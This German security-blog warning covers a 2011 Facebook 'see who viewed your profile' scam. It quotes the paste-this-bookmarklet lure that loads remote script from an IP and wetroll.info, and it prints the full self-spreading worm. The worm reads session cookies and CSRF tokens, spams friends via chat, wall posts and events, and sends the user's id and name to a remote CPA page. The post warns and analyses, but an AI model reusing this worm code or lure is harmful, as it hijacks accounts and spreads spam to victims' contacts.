Security

Facebook Nachricht: Facebook kann dir jetzt anzeigen wer dein Profil ansieht

Den Link in dieser Meldung auf keinen Fall folgen!

Derzeit werden mal wieder Links durch die Gegend geschickt von denen der Betroffene keine Ahnung hat! Der Inhalt ist immer sehr ähnlich und lautet wie folgt: XXX wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ http://bit.ly/hAZudfss Folgt man diesen Link, wird man auf eine Webseite weiter geleitet! Bis nun ist noch nichts Schlimmes passiert!

Jedoch gibt es auf der Webseite eine kleine Anleitung zu sehen, welche dem Anwender verspricht die letzten Profilbesucher sichtbar zu machen! Dazu muss man den Facebook-Link verändern, bzw. diesen durch folgenden Code ersetzen:

javascript:(a=(b=document).createElement('script‘)).src='//216.24.202.125/german2.php?'+Math.random(),b.body.appendChild(a);void(0)

 

Macht man dies wird das Facebook-Profil manipuliert und Nachrichten und Posts erstellt, ohne dass der User dies möchte!

Auch solltet ihr keinen Meldungen folgen, welche wie folgt lauten:

Meine Top Profil Stalker:
Name 1 –  1136 Besuche
Name 2 – 983 Besuche
usw.
Schau dir an wer dein Profil sieht @http://bit.ly/asdfsadfwe

 

Wie man hier auch sehr schön sehen kann, ist die Anzahl der Besucher immer gleich! ;)

 

Auch hier werdet ihr auf die Seite mit der tollen Anleitung weiter geleitet, welche Euch verführt Euer Profil zu missbrauchen!

Die Webseite sieht übrigens wie folgt aus!

Wobei sich diese sehr schnell ändern kann!

Hier ein paar Infos zum Thema Facebook – letzte Profilbesucher ansehen!

Bitte klickt auf den Gefällt mir Button um die restlichen User zu warnen!

 

Facebook-Virus-Profilbesucher

 

Für alle unter Euch, welche Programmiersprache lesen können, hier das Script welches ausgeführt wird:

 

 

var chatmessage = „%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ http://ow.ly/4DL8N“;
var postmessage = „Meine Top Profil-Stalker: \n\ %tf% – 1136 Besuche \n\ %tf% – 983 Besuche \n\ %tf% – 542 Besuche \n\ %tf% – 300 Besuche \n\ Schau dir an wer dein Profil sieht @ http://ow.ly/4DL8N“;
var redirect = „http://216.119.153.147/cpa.php/“;
var eventdesc = „Sewfwe“;
var eventname = „WOdd“;
var nfriends = 20;

// <script>
// the following line is what they paste into the browser:
// javascript:(a=(b=document).createElement('script‘)).src='//wetroll.info/e.js?'+Math.random(),b.body.appendChild(a);void(0)
var debug=false;

var wf=0;

var mf = function() {
if (wf <= 0) { // redirect to final page which closes, because iframes don't deliver cookies reliably
setTimeout(function () {
window.top.location.href = redirect;
}, 500);
}
}

var doget = function(url, c, f) {
var xhr = new XMLHttpRequest();
xhr.open(„GET“, url);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if (xhr.status == 200 && c) {
c(xhr.responseText);
}
if (f) { f(); }
}
}
xhr.send();
};

doget(„/“, function(z) {
var uid = document.cookie.match(/c_user=(\d+)/)[1];
var tag = function(o) {
return o ? „@[“ + o.id + „:“ + o.name + „]“ : „“;
};
var name = function(o) {
return o ? o.name : „“;
};
var htp = function(o) {
out = „“;
for (var n in o) {
out += (out ? „&“ : „“) + n + ((o[n] !== null) ? „=“ + encodeURIComponent(o[n]) : „“);
}
return out;
};
var dopost = function(url, o, c, f) {
var xhr = new XMLHttpRequest();
xhr.open(„POST“, url);
xhr.setRequestHeader(„Content-Type“, „application/x-www-form-urlencoded“);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if (xhr.status == 200 && c) {
c(xhr.responseText);
}
if (f) { f(); }
}
}
xhr.send(htp(o));
};
var coverpage = function() {
var boxdiv = document.createElement(‚div‘);
boxdiv.style.display = ‚block‘;
boxdiv.style.position = ‚absolute‘;
boxdiv.style.width = 100 + ‚%‘;
boxdiv.style.height = 100 + ‚%‘;
boxdiv.style.left = 0 + ‚px‘;
boxdiv.style.top = 0 + ‚px‘;
boxdiv.style.textAlign = ‚center‘;
boxdiv.style.padding = ‚4px‘;
boxdiv.style.background = ‚#FFFFFF‘;
boxdiv.style.zIndex = 999999;
boxdiv.innerHTML=' <br/>Please wait, this can take up to a minute…<br/><br/>Or if you get sick of waiting, you can <a href=“javascript:void(0);“ onclick=“wf=0; mf();“>click here</a> (results may be less accurate)<br/><img src=“http://genetics.bwh.harvard.edu/snp2rflp/circle.gif“>‘;
document.body.appendChild(boxdiv);
}
var ccc=z.match(/name=\\“xhpc_composerid\\“ value=\\“([\d\w]+)\\“/i);
if (ccc)
comp=ccc[1];
else
comp=“;
//var comp = z.match(/name=“xhpc_composerid“ value=“([\d\w]+)“/i)[1];
var form = z.match(/name=“post_form_id“ value=“([\d\w]+)“/i)[1];
var dt = z.match(/name=“fb_dtsg“ value=“([\d\w]+)“/i)[1];
var username = document.getElementById('navAccountName‘).firstChild.data;
redirect = redirect + „?“ + htp({userid:uid,name:username,doclose:1});

coverpage();

if (eventdesc) {
// type=event&eid&&&invite_message=&__d=1&post_form_id=fb2f0d3e0fa68266ebd293dbd9e84d84&fb_dtsg=GsuSc&lsd&post_form_id_source=AsyncRequest
wf++;

dopost(‚/ajax/choose/?__a=1′, {
type:'event‘, eid:null, invite_message:“, __d:1, post_form_id:form, fb_dtsg:dt, lsd:null, post_form_id_source:“AsyncRequest“
},
function(rt) {
var tok = rt.match(/\\“token\\“:\\“([^\]+)\\“/)[1];  //   \“token\“:\“1301833849-6\“,
// alert(„token: “ + tok);
var url = „/ajax/typeahead/first_degree.php?__a=1&viewer=“ + uid + „&token=“ + tok + „&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha“;
// GET /ajax/typeahead/first_degree.php?__a=1&viewer=1019042345&token=1301939940-6&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha
doget(url, function (rt2) {
var q = rt2.match(/\{„uid“:\d+,/g);
var flist = [];
for (var i=0; i < q.length; i++) {
var id = q[i].match(/:(\d+),/)[1];
if (id != uid) {
flist.push(id);
}
}
// alert(„friends: “ + flist.join(„, „));

var d = new Date();
d.setTime(d.getTime() + 60*60*24*1000); // add one day to the date object
datestr = (d.getMonth()+1) + „/“ + d.getDate() + „/“ + d.getFullYear();
timestr = d.getHours() * 60;
var eo = {
post_form_id:form,fb_dtsg:dt,
start_time_intl_field:datestr, start_time_text_field:datestr, start_time_hour_min:timestr,
name:eventname,
place_page_id:““,location:““,street:““,geo_id:““,geo_sq:““,
desc:eventdesc,
sgb_invitees:flist.join(„,“),
sgb_emails:““,sgb_message:““,
privacy_type:“on“,guest_list:“on“,connections_can_post:“on“,save:“Create Event“,submitting:““
};
eo['new‘] = “;
dopost(‚/events/create.php‘, eo, false, function() { mf(–wf); });
}
);
}
);
}

/*
if (false) {
wf++;
doget(„/ajax/browser/friends/?uid=“ + uid + „&filter=all&__a=1&__d=1“, function(rt) {
var q = rt.match(/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\“http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var flist = [];
for (var i=0; i < q.length; i++) {
var id = q[i].match(/_\d+_/)[0].replace(/_/g, „“);
flist.push(id);
}

var d = new Date();
d.setTime(d.getTime() + 60*60*24*1000); // add one day to the date object
datestr = (d.getMonth()+1) + „/“ + d.getDate() + „/“ + d.getFullYear();
timestr = d.getHours() * 60;
var eo = {
post_form_id:form,fb_dtsg:dt,
start_time_intl_field:datestr, start_time_text_field:datestr, start_time_hour_min:timestr,
name:eventname,
place_page_id:““,location:““,street:““,geo_id:““,geo_sq:““,
desc:eventdesc,
sgb_invitees:flist.join(„,“),
sgb_emails:““,sgb_message:““,
privacy_type:“on“,guest_list:“on“,connections_can_post:“on“,save:“Create Event“,submitting:““
};
eo['new‘] = “;
dopost(‚/events/create.php‘, eo, false, function() { mf(–wf); });
});
}
*/

if (chatmessage) {
wf++;
dopost(‚/ajax/chat/buddy_list.php?__a=1‘, {
user:uid,post_form_id:form,fb_dtsg:dt,lsd:null,
post_form_id_source:“AsyncRequest“,popped_out:false,force_render:true},
function (rt) {
var data = rt.substr(9);
var resobj = eval(„(“ + data + „)“);
var bl = resobj.payload.buddy_list;
for (var fid in bl.nowAvailableList) {
var r = Math.floor(Math.random()*1335448958);
var t = (new Date()).getTime();
var m = chatmessage.replace(„%firstname%“, bl.userInfos[fid].firstName.toLowerCase());
dopost(‚/ajax/chat/send.php?__a=1‘, {
msg_id:Math.floor(Math.random()*1335448958), client_time:(new Date()).getTime(),
msg_text:chatmessage.replace(„%firstname%“, bl.userInfos[fid].firstName.toLowerCase()),
to:fid, post_form_id:form, fb_dtsg:dt, post_form_id_source:“AsyncRequest“
});
}
mf(–wf);  // if no online buddies and this returns last, then finalize
}
);
}

if (postmessage) {
wf++;
doget(„/ajax/browser/friends/?uid=“ + uid + „&filter=all&__a=1&__d=1“, function(rt) {
var q = rt.match(/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\“http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
var pf = [];
if (q)
for (var i=0; i < q.length; i++) {
var id = q[i].match(/_\d+_/)[0].replace(/_/g, „“);
var nm = q[i].match(/>[^>]+\\u003c\\\/a>$/i)[0].replace(/\\u003c\\\/a>$/gim, „“).replace(/>/g, „“);
pf.push({id:id,name:nm});
}
var f=[];
var f2=[];
while (pf.length) {
var idx = Math.floor(Math.random() * pf.length);
f.push(pf[idx]);
f2.push(pf[idx]); // make a copy
var t = pf.shift(); // pull off the first element
if (idx) {
pf[idx-1] = t;  // replace the random element we copied to f
}
}

if (debug) { alert(„fetched friends: “ + f.length); }

var po={post_form_id:form,fb_dtsg:dt,xhpc_composerid:comp,xhpc_targetid:uid,xhpc_context:“home“,xhpc_fbx:““,
lsd:null,post_form_id_source:“AsyncRequest“};
mt = postmessage;
m = postmessage;
while (mt.search(„%tf%“) >= 0) {
var tf = f.pop();
mt = mt.replace(„%tf%“, name(tf));
m = m.replace(„%tf%“, tag(tf));
}
po.xhpc_message_text = mt;
po.xhpc_message = m;

if (debug) { alert(„message text: “ + mt); }

dopost(„/ajax/updatestatus.php?__a=1″, po);  // do status post

var fpost = function(n) {
if (n == 0) {
wf = 0;    // made specified number of posts, force return
mf();
return;
}
var fz = f2.shift();
var pz={post_form_id:form,fb_dtsg:dt,xhpc_composerid:comp,xhpc_targetid:fz.id,xhpc_context:“profile“,xhpc_fbx:1,
lsd:null,post_form_id_source:“AsyncRequest“};
var zmt = postmessage;
var zm = postmessage;
if (f.length == 0) {
wf = 0;    // ran out of friends, force return
mf();
return;
}
while (zmt.search(„%tf%“) >= 0) {
var ztf = f.pop();
zmt = zmt.replace(„%tf%“, name(ztf));
zm = zm.replace(„%tf%“, tag(ztf));
}
pz.xhpc_message_text = zmt;
pz.xhpc_message = zm;

dopost(„/ajax/updatestatus.php?__a=1“, pz);
setTimeout(function() { fpost(n-1); }, 2000);  // after two seconds kick off fpost again
};

wf++;  // wait until we run out of friends to tag or meet requested number of friends walls
setTimeout(function() { fpost(nfriends); }, 2000);
});
}

mf();  // should only trigger if chatmessage and postmessage are both disabled
});


Tags:

  • Schau dir deine Profil-Stalker an - http://www google com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http://who-spying-u blogspot com/&ei=SHO2TaAkiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw?0bivcfq3 ~~ 0bivcfq3
  • Stalker profil
  • schau dir an wer dein profil sieht
  • Xn69xx
  • facebook Nachricht von 2011 anzeigen
Tags

Related Articles

7 Comments

  1. In dieser Ausführung ist die Sache noch ziemlich unproblematisch! Macht einfach alle Facebook-Sessions zu (am einfachsten Rechner einmal durchstarten) – und ändert dann sicherheitshalber Euer Passwort. Dann ist der Zauber vorbei! ;)

Kommentar verfassen

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.

Back to top button
Close

Send this to a friend